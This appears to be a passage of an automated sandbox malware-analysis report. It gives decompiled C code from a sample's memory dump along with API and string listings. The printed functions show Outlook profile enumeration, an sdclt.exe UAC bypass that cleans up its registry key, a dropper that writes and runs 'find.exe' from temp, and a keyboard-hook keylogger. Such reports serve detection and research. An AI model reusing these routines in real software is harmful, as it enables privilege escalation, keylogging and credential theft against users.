                                                                    0x02d1a22f
                                                                    0x02d1a24c
                                                                    0x02d1a24e
                                                                    0x02d1a250
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x02d1a252
                                                                    0x02d1a256
                                                                    0x02d1a259
                                                                    0x02d1a261
                                                                    0x02d1a282
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x02d1a284
                                                                    0x02d1a288
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x02d1a288
                                                                    0x00000000
                                                                    0x02d1a1cc
                                                                    0x02d1a16f
                                                                    0x00000000
                                                                    0x02d1a16f
                                                                    0x02d1a152
                                                                    0x00000000
                                                                    0x02d1a152
                                                                    0x02d1a135
                                                                    0x00000000

                                                                    APIs
                                                                    • RegOpenKeyExW.ADVAPI32(80000001,Software\Microsoft\Office\15.0Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676,00000000,000F003F,?), ref: 02D1A12F
                                                                    • RegOpenKeyExW.ADVAPI32(80000001,Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676,00000000,000F003F,?), ref: 02D1A14C
                                                                    • lstrcpyW.KERNEL32 ref: 02D1A19F
                                                                    • RegQueryInfoKeyW.ADVAPI32(?,00000000,00000000,00000000,?,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 02D1A1B5
                                                                    • RegEnumKeyExW.ADVAPI32 ref: 02D1A1E8
                                                                    • RegCloseKey.ADVAPI32(?), ref: 02D1A1F9
                                                                    • lstrcpyW.KERNEL32 ref: 02D1A20D
                                                                    • lstrcatW.KERNEL32(?,02D24684), ref: 02D1A21B
                                                                    • lstrcatW.KERNEL32(?,?), ref: 02D1A22F
                                                                    • RegOpenKeyExW.ADVAPI32(80000001,?,00000000,000F003F,?), ref: 02D1A24C
                                                                    • RegCloseKey.ADVAPI32(?,?), ref: 02D1A261
                                                                    • RegOpenKeyExW.ADVAPI32(80000001,?,00000000,000F003F,?), ref: 02D1A27E
                                                                    Strings
                                                                    • Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676, xrefs: 02D1A17C, 02D1A181, 02D1A191
                                                                    • Software\Microsoft\Windows Messaging Subsystem\Profiles\9375CFF0413111d3B88A00104B2A6676, xrefs: 02D1A15F, 02D1A16F
                                                                    • Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676, xrefs: 02D1A142, 02D1A152
                                                                    • Software\Microsoft\Office\15.0Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676, xrefs: 02D1A125
                                                                    • Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676, xrefs: 02D1A135
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.265787896.0000000002D11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D10000, based on PE: true
                                                                    • Associated: 00000000.00000002.265777345.0000000002D10000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.265818960.0000000002D24000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.265836002.0000000002D29000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.265991289.0000000002E5D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.266002119.0000000002E5F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_2d10000_SecuriteInfo.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: Open$Closelstrcatlstrcpy$EnumInfoQuery
                                                                    • String ID: Software\Microsoft\Office\15.0Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676$Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676$Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676$Software\Microsoft\Windows Messaging Subsystem\Profiles\9375CFF0413111d3B88A00104B2A6676$Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
                                                                    • API String ID: 1891545080-2020977430
                                                                    • Opcode ID: 649c025dd6160bf7721391dba0527ba1d9d76fca3b6a602169ad30b5e5251d24
                                                                    • Instruction ID: 72855e9c5244cea506b711963bbce564f5df6a302b698de9f2b20b3b2d465556
                                                                    • Opcode Fuzzy Hash: 649c025dd6160bf7721391dba0527ba1d9d76fca3b6a602169ad30b5e5251d24
                                                                    • Instruction Fuzzy Hash: 1F413FB2D4112DBEEB21DA91EC44FFB776CEF14784F100465B909E2601E6719E98DBB0
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 02D21AB9 Relevance: 31.6, APIs: 12, Strings: 6, Instructions: 90sleepregistrystringCOMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 85%
                                                                    			E02D21AB9(void* __edx, void* __eflags) {
				void* _v8;
				char _v12;
				struct _SHELLEXECUTEINFOW _v72;
				short _v592;
				char _v1616;
				short* _t53;

				if(E02D1FBFC() != 1) {
					CloseHandle( *0x2d298b8);
					_v8 = 0;
					__imp__IsWow64Process(GetCurrentProcess(),  &_v8);
					if(_v8 != 0) {
						_t47 =  &_v12;
						E02D1F7E0( &_v12);
					}
					E02D218BA();
					E02D11052( &_v1616, 0, 0x400);
					GetModuleFileNameA(0,  &_v1616, 0x400);
					E02D21855(_t47, 0x2d26056,  &_v1616);
					E02D21855(_t47, "DelegateExecute", 0x2d26056);
					GetSystemDirectoryW( &_v592, 0x104);
					lstrcatW( &_v592, L"\\sdclt.exe");
					_t53 = L"open";
					ShellExecuteW(0, _t53,  &_v592, 0, 0, 1);
					asm("movaps xmm0, [0x2d27570]");
					_v72.lpFile =  &_v592;
					_v72.cbSize = 0x3c;
					_v72.fMask = 0x40;
					_v72.hwnd = 0;
					_v72.lpVerb = _t53;
					asm("movups [ebp-0x30], xmm0");
					ShellExecuteExW( &_v72);
					TerminateProcess(_v72.hProcess, 0);
					if(_v8 != 0) {
						E02D1F7B9( &_v12);
					}
					Sleep(0x7d0);
					RegDeleteKeyA(0x80000001, "Software\\Classes\\Folder\\shell\\open\\command");
					ExitProcess(0);
				}
				return 0;
			}









                                                                    0x02d21acc
                                                                    0x02d21ad8
                                                                    0x02d21ae4
                                                                    0x02d21aee
                                                                    0x02d21af7
                                                                    0x02d21af9
                                                                    0x02d21afc
                                                                    0x02d21afc
                                                                    0x02d21b01
                                                                    0x02d21b14
                                                                    0x02d21b25
                                                                    0x02d21b38
                                                                    0x02d21b43
                                                                    0x02d21b57
                                                                    0x02d21b69
                                                                    0x02d21b79
                                                                    0x02d21b81
                                                                    0x02d21b87
                                                                    0x02d21b94
                                                                    0x02d21b9b
                                                                    0x02d21ba2
                                                                    0x02d21ba9
                                                                    0x02d21bac
                                                                    0x02d21baf
                                                                    0x02d21bb3
                                                                    0x02d21bbd
                                                                    0x02d21bc6
                                                                    0x02d21bcb
                                                                    0x02d21bcb
                                                                    0x02d21bd5
                                                                    0x02d21be5
                                                                    0x02d21bec
                                                                    0x02d21bec
                                                                    0x02d21bf7

                                                                    APIs
                                                                      • Part of subcall function 02D1FBFC: GetCurrentProcess.KERNEL32(00000008,00000000,745D0770,00000000,745D0770,00000000,?,?,?,?,02D235AB,?), ref: 02D1FC0E
                                                                      • Part of subcall function 02D1FBFC: OpenProcessToken.ADVAPI32(00000000,?,?,?,?,02D235AB,?), ref: 02D1FC15
                                                                      • Part of subcall function 02D1FBFC: GetTokenInformation.KERNELBASE(?,00000014(TokenIntegrityLevel),?,00000004,?,?,?,?,?,02D235AB,?), ref: 02D1FC33
                                                                      • Part of subcall function 02D1FBFC: FindCloseChangeNotification.KERNEL32(00000000), ref: 02D1FC48
                                                                    • CloseHandle.KERNEL32(?,00000000), ref: 02D21AD8
                                                                    • GetCurrentProcess.KERNEL32(?), ref: 02D21AE7
                                                                    • IsWow64Process.KERNEL32(00000000), ref: 02D21AEE
                                                                    • GetModuleFileNameA.KERNEL32(00000000,?,00000400), ref: 02D21B25
                                                                    • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 02D21B57
                                                                    • lstrcatW.KERNEL32(?,\sdclt.exe), ref: 02D21B69
                                                                    • ShellExecuteW.SHELL32(00000000,open,?,00000000,00000000,00000001), ref: 02D21B81
                                                                    • ShellExecuteExW.SHELL32(?), ref: 02D21BB3
                                                                    • TerminateProcess.KERNEL32(00000000,00000000), ref: 02D21BBD
                                                                    • Sleep.KERNEL32(000007D0), ref: 02D21BD5
                                                                    • RegDeleteKeyA.ADVAPI32(80000001,Software\Classes\Folder\shell\open\command), ref: 02D21BE5
                                                                    • ExitProcess.KERNEL32 ref: 02D21BEC
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.265787896.0000000002D11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D10000, based on PE: true
                                                                    • Associated: 00000000.00000002.265777345.0000000002D10000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.265818960.0000000002D24000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.265836002.0000000002D29000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.265991289.0000000002E5D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.266002119.0000000002E5F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_2d10000_SecuriteInfo.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: Process$CloseCurrentExecuteShellToken$ChangeDeleteDirectoryExitFileFindHandleInformationModuleNameNotificationOpenSleepSystemTerminateWow64lstrcat
                                                                    • String ID: <$@$DelegateExecute$Software\Classes\Folder\shell\open\command$\sdclt.exe$open
                                                                    • API String ID: 368901745-2081737068
                                                                    • Opcode ID: b8c8284d5892e6d19c599512c26072315ab34aa2466e1cf4f90e50eff8f1573e
                                                                    • Instruction ID: 00d61bfe10217087769bd71e1a4a0bc55ea751b12de8b33263ef93419d43f0b0
                                                                    • Opcode Fuzzy Hash: b8c8284d5892e6d19c599512c26072315ab34aa2466e1cf4f90e50eff8f1573e
                                                                    • Instruction Fuzzy Hash: 98319C71C41128FBDB21ABA5EC489DEBBBCEF65305F124495F909A2300E7304E59CFA0
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 02D230C9 Relevance: 29.9, APIs: 12, Strings: 5, Instructions: 122filestringCOMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 80%
                                                                    			E02D230C9(void* __eax, void* __ebx, void* __ecx, void* __edx, signed int __esi, long _a4) {
				intOrPtr* _v8;
				long _v12;
				struct _SHELLEXECUTEINFOA _v72;
				char _v1096;
				char _v2120;
				char _v3144;
				void* _t46;
				void* _t48;
				void* _t77;
				void* _t82;
				void* _t99;
				void* _t104;

				 *((intOrPtr*)(_t104 + __esi * 2 - 0x2e)) =  *((intOrPtr*)(_t104 + __esi * 2 - 0x2e)) + __edx;
				_t82 = __ecx +  *((intOrPtr*)(__ebx + 0x86183c1));
				_t77 = __ebx + __eax;
				_push(_t77);
				_push(__esi);
				_t88 =  *_a4;
				_t78 = _t82 + 4;
				_v8 = _t82 + 4;
				E02D13437(_t78, E02D21DC0( *_a4 + 4,  *_t88));
				E02D15EA5(_a4);
				_t46 = LoadResource(0, _a4);
				_a4 = SizeofResource(0, _a4);
				_t48 = LockResource(_t46);
				E02D11052( &_v1096, 0, 0x400);
				E02D11052( &_v2120, 0, 0x400);
				GetTempPathA(0x400,  &_v1096);
				lstrcatA( &_v1096, "find.exe");
				GetTempPathA(0x400,  &_v2120);
				lstrcatA( &_v2120, "find.db");
				_t99 = CreateFileA( &_v1096, 0x10000000, 1, 0, 2, 0x84, 0);
				WriteFile(_t99, _t48, _a4,  &_v12, 0);
				CloseHandle(_t99);
				E02D11052( &_v3144, 0, 0x400);
				wsprintfA( &_v3144, "-w %ws -d C -f %s",  *_v8,  &_v2120);
				_v72.cbSize = 0x3c;
				_v72.lpFile =  &_v1096;
				_v72.fMask = 0x40;
				asm("xorps xmm0, xmm0");
				_v72.lpParameters =  &_v3144;
				asm("movlpd [ebp-0x20], xmm0");
				asm("movlpd [ebp-0x18], xmm0");
				asm("movlpd [ebp-0x10], xmm0");
				_v72.hwnd = 0;
				_v72.lpVerb = 0;
				_v72.lpDirectory = 0;
				_v72.nShow = 0;
				_v72.hInstApp = 0;
				return ShellExecuteExA( &_v72);
			}















                                                                    0x02d230c9
                                                                    0x02d230cd
                                                                    0x02d230d3
                                                                    0x02d230e1
                                                                    0x02d230e2
                                                                    0x02d230e4
                                                                    0x02d230e6
                                                                    0x02d230ec
                                                                    0x02d230fd
                                                                    0x02d23105
                                                                    0x02d23110
                                                                    0x02d23123
                                                                    0x02d23126
                                                                    0x02d2313c
                                                                    0x02d2314a
                                                                    0x02d23160
                                                                    0x02d23174
                                                                    0x02d23182
                                                                    0x02d23190
                                                                    0x02d231b2
                                                                    0x02d231bd
                                                                    0x02d231c4
                                                                    0x02d231d7
                                                                    0x02d231f4
                                                                    0x02d23200
                                                                    0x02d23207
                                                                    0x02d23213
                                                                    0x02d2321a
                                                                    0x02d2321d
                                                                    0x02d23223
                                                                    0x02d23229
                                                                    0x02d2322e
                                                                    0x02d23233
                                                                    0x02d23236
                                                                    0x02d23239
                                                                    0x02d2323c
                                                                    0x02d2323f
                                                                    0x02d2324c

                                                                    APIs
                                                                      • Part of subcall function 02D13437: lstrcpyW.KERNEL32 ref: 02D1345C
                                                                      • Part of subcall function 02D15EA5: VirtualFree.KERNELBASE(?,00000000,00008000,02D15C2A,00000000,?,02D210EE,?,?,02D236DB), ref: 02D15EAD
                                                                    • LoadResource.KERNEL32(00000000,?,00000000), ref: 02D23110
                                                                    • SizeofResource.KERNEL32(00000000,?), ref: 02D2311C
                                                                    • LockResource.KERNEL32(00000000), ref: 02D23126
                                                                    • GetTempPathA.KERNEL32(00000400,?), ref: 02D23160
                                                                    • lstrcatA.KERNEL32(?,find.exe), ref: 02D23174
                                                                    • GetTempPathA.KERNEL32(00000400,?), ref: 02D23182
                                                                    • lstrcatA.KERNEL32(?,find.db), ref: 02D23190
                                                                    • CreateFileA.KERNEL32(?,10000000,00000001,00000000,00000002,00000084,00000000), ref: 02D231AB
                                                                    • WriteFile.KERNEL32(00000000,00000000,?,?,00000000), ref: 02D231BD
                                                                    • CloseHandle.KERNEL32(00000000), ref: 02D231C4
                                                                    • wsprintfA.USER32 ref: 02D231F4
                                                                    • ShellExecuteExA.SHELL32(0000003C), ref: 02D23242
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.265787896.0000000002D11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D10000, based on PE: true
                                                                    • Associated: 00000000.00000002.265777345.0000000002D10000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.265818960.0000000002D24000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.265836002.0000000002D29000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.265991289.0000000002E5D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.266002119.0000000002E5F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_2d10000_SecuriteInfo.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: Resource$FilePathTemplstrcat$CloseCreateExecuteFreeHandleLoadLockShellSizeofVirtualWritelstrcpywsprintf
                                                                    • String ID: -w %ws -d C -f %s$<$@$find.db$find.exe
                                                                    • API String ID: 2504251837-265381321
                                                                    • Opcode ID: 5a2c47a93415f3fcea62e985190257b1cf02a8a7a13f75d2632273b21fc380f1
                                                                    • Instruction ID: 1ea1124f750491c1fa162ab8805182852647f45ed54a75deb3624b024e33c80c
                                                                    • Opcode Fuzzy Hash: 5a2c47a93415f3fcea62e985190257b1cf02a8a7a13f75d2632273b21fc380f1
                                                                    • Instruction Fuzzy Hash: 23414CB1C00219ABDB20DFA0DD84EDEBBBCFF99304F114556FA09A2200D7749A49CFA4
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 02D230D5 Relevance: 29.9, APIs: 12, Strings: 5, Instructions: 119filestringCOMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 84%
                                                                    			E02D230D5(void* __ecx, void* __eflags, long _a4) {
				intOrPtr* _v8;
				long _v12;
				struct _SHELLEXECUTEINFOA _v72;
				char _v1096;
				char _v2120;
				char _v3144;
				void* _t38;
				void* _t40;
				void* _t83;

				_t75 =  *_a4;
				_t68 = __ecx + 4;
				_v8 = __ecx + 4;
				E02D13437(_t68, E02D21DC0( *_a4 + 4,  *_t75));
				E02D15EA5(_a4);
				_t38 = LoadResource(0, _a4);
				_a4 = SizeofResource(0, _a4);
				_t40 = LockResource(_t38);
				E02D11052( &_v1096, 0, 0x400);
				E02D11052( &_v2120, 0, 0x400);
				GetTempPathA(0x400,  &_v1096);
				lstrcatA( &_v1096, "find.exe");
				GetTempPathA(0x400,  &_v2120);
				lstrcatA( &_v2120, "find.db");
				_t83 = CreateFileA( &_v1096, 0x10000000, 1, 0, 2, 0x84, 0);
				WriteFile(_t83, _t40, _a4,  &_v12, 0);
				CloseHandle(_t83);
				E02D11052( &_v3144, 0, 0x400);
				wsprintfA( &_v3144, "-w %ws -d C -f %s",  *_v8,  &_v2120);
				_v72.cbSize = 0x3c;
				_v72.lpFile =  &_v1096;
				_v72.fMask = 0x40;
				asm("xorps xmm0, xmm0");
				_v72.lpParameters =  &_v3144;
				asm("movlpd [ebp-0x20], xmm0");
				asm("movlpd [ebp-0x18], xmm0");
				asm("movlpd [ebp-0x10], xmm0");
				_v72.hwnd = 0;
				_v72.lpVerb = 0;
				_v72.lpDirectory = 0;
				_v72.nShow = 0;
				_v72.hInstApp = 0;
				return ShellExecuteExA( &_v72);
			}












                                                                    0x02d230e4
                                                                    0x02d230e6
                                                                    0x02d230ec
                                                                    0x02d230fd
                                                                    0x02d23105
                                                                    0x02d23110
                                                                    0x02d23123
                                                                    0x02d23126
                                                                    0x02d2313c
                                                                    0x02d2314a
                                                                    0x02d23160
                                                                    0x02d23174
                                                                    0x02d23182
                                                                    0x02d23190
                                                                    0x02d231b2
                                                                    0x02d231bd
                                                                    0x02d231c4
                                                                    0x02d231d7
                                                                    0x02d231f4
                                                                    0x02d23200
                                                                    0x02d23207
                                                                    0x02d23213
                                                                    0x02d2321a
                                                                    0x02d2321d
                                                                    0x02d23223
                                                                    0x02d23229
                                                                    0x02d2322e
                                                                    0x02d23233
                                                                    0x02d23236
                                                                    0x02d23239
                                                                    0x02d2323c
                                                                    0x02d2323f
                                                                    0x02d2324c

                                                                    APIs
                                                                      • Part of subcall function 02D13437: lstrcpyW.KERNEL32 ref: 02D1345C
                                                                      • Part of subcall function 02D15EA5: VirtualFree.KERNELBASE(?,00000000,00008000,02D15C2A,00000000,?,02D210EE,?,?,02D236DB), ref: 02D15EAD
                                                                    • LoadResource.KERNEL32(00000000,?,00000000), ref: 02D23110
                                                                    • SizeofResource.KERNEL32(00000000,?), ref: 02D2311C
                                                                    • LockResource.KERNEL32(00000000), ref: 02D23126
                                                                    • GetTempPathA.KERNEL32(00000400,?), ref: 02D23160
                                                                    • lstrcatA.KERNEL32(?,find.exe), ref: 02D23174
                                                                    • GetTempPathA.KERNEL32(00000400,?), ref: 02D23182
                                                                    • lstrcatA.KERNEL32(?,find.db), ref: 02D23190
                                                                    • CreateFileA.KERNEL32(?,10000000,00000001,00000000,00000002,00000084,00000000), ref: 02D231AB
                                                                    • WriteFile.KERNEL32(00000000,00000000,?,?,00000000), ref: 02D231BD
                                                                    • CloseHandle.KERNEL32(00000000), ref: 02D231C4
                                                                    • wsprintfA.USER32 ref: 02D231F4
                                                                    • ShellExecuteExA.SHELL32(0000003C), ref: 02D23242
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.265787896.0000000002D11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D10000, based on PE: true
                                                                    • Associated: 00000000.00000002.265777345.0000000002D10000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.265818960.0000000002D24000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.265836002.0000000002D29000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.265991289.0000000002E5D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.266002119.0000000002E5F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_2d10000_SecuriteInfo.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: Resource$FilePathTemplstrcat$CloseCreateExecuteFreeHandleLoadLockShellSizeofVirtualWritelstrcpywsprintf
                                                                    • String ID: -w %ws -d C -f %s$<$@$find.db$find.exe
                                                                    • API String ID: 2504251837-265381321
                                                                    • Opcode ID: 9b953891f74f5e838be4cebbb062622b8af13b46456230468a971a8261bb6ed4
                                                                    • Instruction ID: 6b9d22386ac0493eb67b6365b5edef14f544335068fb14031452edcdd1afef57
                                                                    • Opcode Fuzzy Hash: 9b953891f74f5e838be4cebbb062622b8af13b46456230468a971a8261bb6ed4
                                                                    • Instruction Fuzzy Hash: 49412CB1D0021DABDB20DFA5DD84EDEBBBCFF99304F114556FA09A2200D7749A498FA4
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 02D1882F Relevance: 26.4, APIs: 11, Strings: 4, Instructions: 135windowstringfileCOMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 71%
                                                                    			E02D1882F(void* __edx, void* __eflags) {
				short _v176;
				struct tagMSG _v204;
				void* _v208;
				struct _SYSTEMTIME _v228;
				struct HINSTANCE__* _t19;
				intOrPtr _t22;
				intOrPtr _t25;
				intOrPtr _t27;
				intOrPtr _t40;
				intOrPtr _t45;
				void* _t46;
				void* _t49;
				intOrPtr* _t50;
				void* _t59;
				struct HINSTANCE__* _t60;
				intOrPtr _t62;
				intOrPtr _t64;
				intOrPtr _t66;
				void* _t68;
				void* _t71;
				void* _t75;
				void* _t79;
				void* _t90;

				_t90 = __eflags;
				_t71 = __edx;
				_t19 = GetModuleHandleA(0);
				_t62 =  *0x2d296a0; // 0x0
				_t60 = _t19;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				E02D11052(_t62 + 0x210, 0, 0x800);
				_t22 =  *0x2d296a0; // 0x0
				E02D11052(_t22 + 0x10, 0, 0x208);
				_t25 =  *0x2d296a0; // 0x0
				__imp__SHGetFolderPathW(0, 0x1c, 0, 0, _t25 + 0x10, _t75, _t79, _t59);
				_t27 =  *0x2d296a0; // 0x0
				lstrcatW(_t27 + 0x10, L"\\Microsoft Vision\\");
				GetLocalTime( &_v228);
				wsprintfW( &(_v204.pt), L"%02d-%02d-%02d_%02d.%02d.%02d", _v228.wDay & 0x0000ffff, _v228.wMonth & 0x0000ffff, _v228.wYear & 0x0000ffff, _v228.wHour & 0x0000ffff, _v228.wMinute & 0x0000ffff, _v228.wSecond & 0x0000ffff);
				_t40 =  *0x2d296a0; // 0x0
				lstrcatW(_t40 + 0x10,  &_v176);
				_t64 =  *0x2d296a0; // 0x0
				_t11 = _t64 + 0x10; // 0x10
				E02D132FF(_t64 + 0xc, _t71, _t11);
				_t45 =  *0x2d296a0; // 0x0
				_t46 = CreateFileW( *(_t45 + 0xc), 0x10000000, 1, 0, 2, 0x80, 0);
				_t66 =  *0x2d296a0; // 0x0
				 *(_t66 + 4) = _t46;
				CloseHandle(_t46);
				_v228.wYear = 0;
				_t68 = E02D21E21("c:\\windows\\system32\\user32.dll",  &_v228);
				_t49 = E02D209D2(_t68, 0, _t90);
				_t91 = _t49;
				if(_t49 == 0) {
					_t50 =  *0x2d2969c; // 0x0
				} else {
					_push(_t68);
					_t50 = E02D20969(_t49, "SetWindowsHookExA", _t91);
					 *0x2d2969c = _t50;
				}
				 *_t50(0xd, E02D189C0, _t60, 0);
				while(GetMessageA( &_v204, 0, 0, 0) > 0) {
					TranslateMessage( &_v204);
					DispatchMessageA( &_v204);
				}
				return 0;
			}


























                                                                    0x02d1882f
                                                                    0x02d1882f
                                                                    0x02d18840
                                                                    0x02d18846
                                                                    0x02d18850
                                                                    0x02d1885a
                                                                    0x02d18860
                                                                    0x02d18861
                                                                    0x02d18862
                                                                    0x02d18867
                                                                    0x02d1886c
                                                                    0x02d1887e
                                                                    0x02d18883
                                                                    0x02d18894
                                                                    0x02d1889a
                                                                    0x02d188ae
                                                                    0x02d188b5
                                                                    0x02d188e9
                                                                    0x02d188f7
                                                                    0x02d18900
                                                                    0x02d18902
                                                                    0x02d18908
                                                                    0x02d1890f
                                                                    0x02d18914
                                                                    0x02d1892c
                                                                    0x02d18932
                                                                    0x02d18939
                                                                    0x02d1893c
                                                                    0x02d18946
                                                                    0x02d18956
                                                                    0x02d18958
                                                                    0x02d1895d
                                                                    0x02d1895f
                                                                    0x02d18976
                                                                    0x02d18961
                                                                    0x02d18961
                                                                    0x02d18969
                                                                    0x02d1896f
                                                                    0x02d1896f
                                                                    0x02d18984
                                                                    0x02d189a7
                                                                    0x02d18996
                                                                    0x02d189a1
                                                                    0x02d189a1
                                                                    0x02d189bd

                                                                    APIs
                                                                    • GetModuleHandleA.KERNEL32(00000000), ref: 02D18840
                                                                    • SHGetFolderPathW.SHELL32(00000000,0000001C,00000000,00000000,-00000010), ref: 02D18894
                                                                    • lstrcatW.KERNEL32(-00000010,\Microsoft Vision\), ref: 02D188AE
                                                                    • GetLocalTime.KERNEL32(?), ref: 02D188B5
                                                                    • wsprintfW.USER32 ref: 02D188E9
                                                                    • lstrcatW.KERNEL32(-00000010,?), ref: 02D18900
                                                                    • CreateFileW.KERNEL32(?,10000000,00000001,00000000,00000002,00000080,00000000,00000010), ref: 02D1892C
                                                                    • CloseHandle.KERNEL32(00000000), ref: 02D1893C
                                                                      • Part of subcall function 02D21E21: CreateFileA.KERNEL32(?,80000000,00000000,00000000,00000003,00000080,00000000,?,?,00000000,?,?,02D234BF), ref: 02D21E4E
                                                                      • Part of subcall function 02D21E21: GetFileSize.KERNEL32(00000000,00000000,?,?,00000000,?,?,02D234BF), ref: 02D21E61
                                                                      • Part of subcall function 02D21E21: ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,?,00000000,?,?,02D234BF), ref: 02D21E72
                                                                      • Part of subcall function 02D21E21: FindCloseChangeNotification.KERNEL32(00000000,?,?,00000000,?,?,02D234BF), ref: 02D21E7F
                                                                      • Part of subcall function 02D209D2: VirtualAlloc.KERNEL32(00000000,?,00003000,00000040,00000000,761F82B0,00000000,?,?,?,?,02D1895D), ref: 02D209FE
                                                                    • GetMessageA.USER32 ref: 02D189AF
                                                                      • Part of subcall function 02D20969: lstrcmpA.KERNEL32(?,02D21BD0,?,open,02D21BD0), ref: 02D209A2
                                                                    • TranslateMessage.USER32(?), ref: 02D18996
                                                                    • DispatchMessageA.USER32 ref: 02D189A1
                                                                    Strings
                                                                    • SetWindowsHookExA, xrefs: 02D18962
                                                                    • %02d-%02d-%02d_%02d.%02d.%02d, xrefs: 02D188E3
                                                                    • \Microsoft Vision\, xrefs: 02D188A8
                                                                    • c:\windows\system32\user32.dll, xrefs: 02D1894A
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.265787896.0000000002D11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D10000, based on PE: true
                                                                    • Associated: 00000000.00000002.265777345.0000000002D10000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.265818960.0000000002D24000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.265836002.0000000002D29000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.265991289.0000000002E5D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.266002119.0000000002E5F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_2d10000_SecuriteInfo.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: File$Message$CloseCreateHandlelstrcat$AllocChangeDispatchFindFolderLocalModuleNotificationPathReadSizeTimeTranslateVirtuallstrcmpwsprintf
                                                                    • String ID: %02d-%02d-%02d_%02d.%02d.%02d$SetWindowsHookExA$\Microsoft Vision\$c:\windows\system32\user32.dll
                                                                    • API String ID: 1641748825-3884914687
                                                                    • Opcode ID: bd962870dd3f69e04f3005b8bf4180c27beb603856c32f1f21f6fa3527ed0b3e
                                                                    • Instruction ID: 66755148b6f5eb4711a26133fc899378e55ebf18ec1dde64a35e5c50093d2779
                                                                    • Opcode Fuzzy Hash: bd962870dd3f69e04f3005b8bf4180c27beb603856c32f1f21f6fa3527ed0b3e
                                                                    • Instruction Fuzzy Hash: 8241B1B1940280BBE720DBAAEC08E6B77ECFBA9705F014819F945D2381D635DD28CB31
                                                                    Uniqueness

